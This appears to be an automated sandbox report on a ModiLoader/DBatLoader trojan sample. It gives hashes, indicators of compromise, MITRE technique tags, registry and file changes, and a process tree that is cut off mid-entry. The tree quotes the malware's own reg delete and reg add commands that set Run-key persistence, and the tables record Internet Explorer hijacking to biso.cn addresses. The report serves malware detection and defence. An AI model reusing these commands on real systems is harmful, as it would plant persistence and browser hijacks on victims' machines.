modiloader | b1f091fde258103951157138a8290ea701496e67533e8365f65a2f7010507e16

Analysis

max time kernel
140s
max time network
119s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
13-12-2024 05:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ea35688c3b4e97ec431e76990e1a5dd7_JaffaCakes118.exe
Size

969KB
MD5

ea35688c3b4e97ec431e76990e1a5dd7
SHA1

ff461480c5b3988c61402def5b63b550c24191b1
SHA256

b1f091fde258103951157138a8290ea701496e67533e8365f65a2f7010507e16
SHA512

887503d47b0172c6148fedb6e73ca77005d4344b2a7575ec7263fd17c5805d6bb01f23671f718b613d3e765e518e357a6fcae04b39e448e28393434184235d58
SSDEEP

24576:IjTBqNfbDLIEgMsuo6Fuajhz9iA018my9yp1QrdQgAsC:rNDDLIEUGFuaj1sA0xIOQpDk

Score

10^/10

modiloader discovery persistence trojan upx

Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modiloader family
modiloader

ModiLoader First Stage 1 IoCs

resource	yara_rule
behavioral1/memory/2188-264-0x0000000000400000-0x00000000006F8000-memory.dmp	modiloader_stage1

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	cmd.exe

Executes dropped EXE 3 IoCs

pid	Process
2188	z.exe
2788	menu.exe
2684	pin.exe

Loads dropped DLL 6 IoCs

pid	Process
2804	cmd.exe
2804	cmd.exe
2804	cmd.exe
2804	cmd.exe
2804	cmd.exe
2804	cmd.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce\360safetray = "\"C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\internat.exe\""	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\internat = "\"C:\\Windows\\repair\\internat.exe\""	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce\360safe = "\"C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\360tray.exe\""	reg.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\WinUpdate.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\WinUpdate.exe	cmd.exe
File created	C:\Windows\SysWOW64\pin.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\pin.exe	cmd.exe

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000700000001944f-14.dat	upx
behavioral1/files/0x0004000000012000-17.dat	upx
behavioral1/memory/2804-29-0x0000000001F80000-0x0000000001F9B000-memory.dmp	upx
behavioral1/memory/2804-37-0x0000000001F80000-0x0000000001F97000-memory.dmp	upx
behavioral1/memory/2804-43-0x0000000001F80000-0x0000000001F97000-memory.dmp	upx
behavioral1/memory/2684-51-0x0000000000400000-0x0000000000417000-memory.dmp	upx
behavioral1/memory/2788-170-0x0000000000400000-0x000000000041B000-memory.dmp	upx
behavioral1/memory/2684-263-0x0000000000400000-0x0000000000417000-memory.dmp	upx

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Internet Explorer\SIGNUP\360tray.exe	cmd.exe
File created	C:\Program Files (x86)\Internet Explorer\SIGNUP\360tray.exe	cmd.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\internet.exe	cmd.exe
File created	C:\Windows\win32.exe	cmd.exe
File opened for modification	C:\Windows\win32.exe	cmd.exe
File created	C:\Windows\repair\internat.exe	cmd.exe
File created	C:\Windows\internet.exe	cmd.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ea35688c3b4e97ec431e76990e1a5dd7_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	at.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	z.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	menu.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	at.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1516	PING.EXE

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}\	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}\MenuText = "╙╬╧╖╡╪┤°"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}\hotIcon = "C:\\Windows\\System32\\shell32.dll,28"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\MenuExt\China-World ╥¬╬┼	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}\Icon = "C:\\Windows\\System32\\shell32.dll,40"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}\MenuText = "FLASH▓Ñ╖┼╞≈"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}\ButtonText = "╨┬╬┼╞╡╡└"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}\MenuText = "╣·─┌╣·╝╩╨┬╬┼"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}\Default Icon = "C:\\Windows\\System32\\shell32.dll,47"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\MenuExt\│ú╙├╚φ╝■╧┬╘╪\ = "http://www.biso.cn/js/menu.asp?menu=soft"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}\ClsidExtension = "╨┬╬┼╫╩╤╢"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}\hotIcon = "C:\\Windows\\System32\\shell32.dll,40"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}\ClsidExtension = "▓╞╛¡╞╡╡└"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}\ButtonText = "FLASH▓Ñ╖┼╞≈╧┬╘╪"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\MenuExt\Google ╚½─▄╦╤╦≈\ = "http://www.biso.cn/js/menu.asp?menu=search"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}\ButtonText = "│ú╙├╚φ╝■"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}\Exec = "http://www.biso.cn/js/re.asp?i=4"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}\CLSID = "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}\CLSID = "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}\CLSID = "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}\ClsidExtension = "╙╬╧╖╡╪┤°"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Search\SearchAssistant = "http://www.biso.cn/google.asp"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}\ClsidExtension = "▒Ω╫╝╦╤╦≈"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}\MenuStatusBar = "▒Ω╫╝╦╤╦≈"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}\MenuStatusBar = "▓╞╛¡╞╡╡└"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}\Icon = "C:\\Windows\\System32\\shell32.dll,26"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}\hotIcon = "C:\\Windows\\System32\\shell32.dll,26"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}\MenuStatusBar = "FLASH▓Ñ╖┼╞≈"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\MenuExt\│ú╙├╚φ╝■╧┬╘╪	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}\Icon = "C:\\Windows\\System32\\shell32.dll,47"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}\CLSID = "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Search	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}\ButtonText = "▒Ω╫╝╦╤╦≈"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}\MenuStatusBar = "╙╬╧╖╡╪┤°"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\MenuExt\╥⌠╙░╙Θ└╓\ = "http://www.biso.cn/js/menu.asp?menu=media"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}\hotIcon = "C:\\Windows\\System32\\shell32.dll,47"	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1516	PING.EXE

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2188	z.exe
2188	z.exe
2188	z.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2656 wrote to memory of 2804	2656	ea35688c3b4e97ec431e76990e1a5dd7_JaffaCakes118.exe	30
PID 2656 wrote to memory of 2804	2656	ea35688c3b4e97ec431e76990e1a5dd7_JaffaCakes118.exe	30
PID 2656 wrote to memory of 2804	2656	ea35688c3b4e97ec431e76990e1a5dd7_JaffaCakes118.exe	30
PID 2656 wrote to memory of 2804	2656	ea35688c3b4e97ec431e76990e1a5dd7_JaffaCakes118.exe	30
PID 2804 wrote to memory of 2188	2804	cmd.exe	32
PID 2804 wrote to memory of 2188	2804	cmd.exe	32
PID 2804 wrote to memory of 2188	2804	cmd.exe	32
PID 2804 wrote to memory of 2188	2804	cmd.exe	32
PID 2804 wrote to memory of 2788	2804	cmd.exe	33
PID 2804 wrote to memory of 2788	2804	cmd.exe	33
PID 2804 wrote to memory of 2788	2804	cmd.exe	33
PID 2804 wrote to memory of 2788	2804	cmd.exe	33
PID 2804 wrote to memory of 2684	2804	cmd.exe	34
PID 2804 wrote to memory of 2684	2804	cmd.exe	34
PID 2804 wrote to memory of 2684	2804	cmd.exe	34
PID 2804 wrote to memory of 2684	2804	cmd.exe	34
PID 2788 wrote to memory of 2604	2788	menu.exe	35
PID 2788 wrote to memory of 2604	2788	menu.exe	35
PID 2788 wrote to memory of 2604	2788	menu.exe	35
PID 2788 wrote to memory of 2604	2788	menu.exe	35
PID 2684 wrote to memory of 2072	2684	pin.exe	37
PID 2684 wrote to memory of 2072	2684	pin.exe	37
PID 2684 wrote to memory of 2072	2684	pin.exe	37
PID 2684 wrote to memory of 2072	2684	pin.exe	37
PID 2604 wrote to memory of 1704	2604	cmd.exe	39
PID 2604 wrote to memory of 1704	2604	cmd.exe	39
PID 2604 wrote to memory of 1704	2604	cmd.exe	39
PID 2604 wrote to memory of 1704	2604	cmd.exe	39
PID 2604 wrote to memory of 1684	2604	cmd.exe	40
PID 2604 wrote to memory of 1684	2604	cmd.exe	40
PID 2604 wrote to memory of 1684	2604	cmd.exe	40
PID 2604 wrote to memory of 1684	2604	cmd.exe	40
PID 2072 wrote to memory of 1516	2072	cmd.exe	41
PID 2072 wrote to memory of 1516	2072	cmd.exe	41
PID 2072 wrote to memory of 1516	2072	cmd.exe	41
PID 2072 wrote to memory of 1516	2072	cmd.exe	41
PID 2604 wrote to memory of 2044	2604	cmd.exe	42
PID 2604 wrote to memory of 2044	2604	cmd.exe	42
PID 2604 wrote to memory of 2044	2604	cmd.exe	42
PID 2604 wrote to memory of 2044	2604	cmd.exe	42
PID 2604 wrote to memory of 2648	2604	cmd.exe	43
PID 2604 wrote to memory of 2648	2604	cmd.exe	43
PID 2604 wrote to memory of 2648	2604	cmd.exe	43
PID 2604 wrote to memory of 2648	2604	cmd.exe	43
PID 2604 wrote to memory of 2584	2604	cmd.exe	44
PID 2604 wrote to memory of 2584	2604	cmd.exe	44
PID 2604 wrote to memory of 2584	2604	cmd.exe	44
PID 2604 wrote to memory of 2584	2604	cmd.exe	44
PID 2604 wrote to memory of 2136	2604	cmd.exe	45
PID 2604 wrote to memory of 2136	2604	cmd.exe	45
PID 2604 wrote to memory of 2136	2604	cmd.exe	45
PID 2604 wrote to memory of 2136	2604	cmd.exe	45
PID 2604 wrote to memory of 2384	2604	cmd.exe	46
PID 2604 wrote to memory of 2384	2604	cmd.exe	46
PID 2604 wrote to memory of 2384	2604	cmd.exe	46
PID 2604 wrote to memory of 2384	2604	cmd.exe	46
PID 2604 wrote to memory of 1524	2604	cmd.exe	47
PID 2604 wrote to memory of 1524	2604	cmd.exe	47
PID 2604 wrote to memory of 1524	2604	cmd.exe	47
PID 2604 wrote to memory of 1524	2604	cmd.exe	47
PID 2604 wrote to memory of 1536	2604	cmd.exe	48
PID 2604 wrote to memory of 1536	2604	cmd.exe	48
PID 2604 wrote to memory of 1536	2604	cmd.exe	48
PID 2604 wrote to memory of 1536	2604	cmd.exe	48

C:\Users\Admin\AppData\Local\Temp\ea35688c3b4e97ec431e76990e1a5dd7_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\ea35688c3b4e97ec431e76990e1a5dd7_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2656
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\z.bat""
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2804
- - C:\Users\Admin\AppData\Local\Temp\step$rewer2\z.exe
    step$rewer2\z.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:2188
- - C:\Users\Admin\AppData\Local\Temp\step$rewer2\menu.exe
    step$rewer2\menu.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2788
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\menu.bat""
      4⤵
      Drops file in System32 directory
      Drops file in Program Files directory
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2604
    - - C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /va /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1704
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce /v 360safetray /d """"C:\Program Files (x86)\Internet Explorer\SIGNUP\internat.exe"""" /f
        5⤵
        Adds Run key to start application
        
        PID:1684
    - - C:\Windows\SysWOW64\reg.exe
        
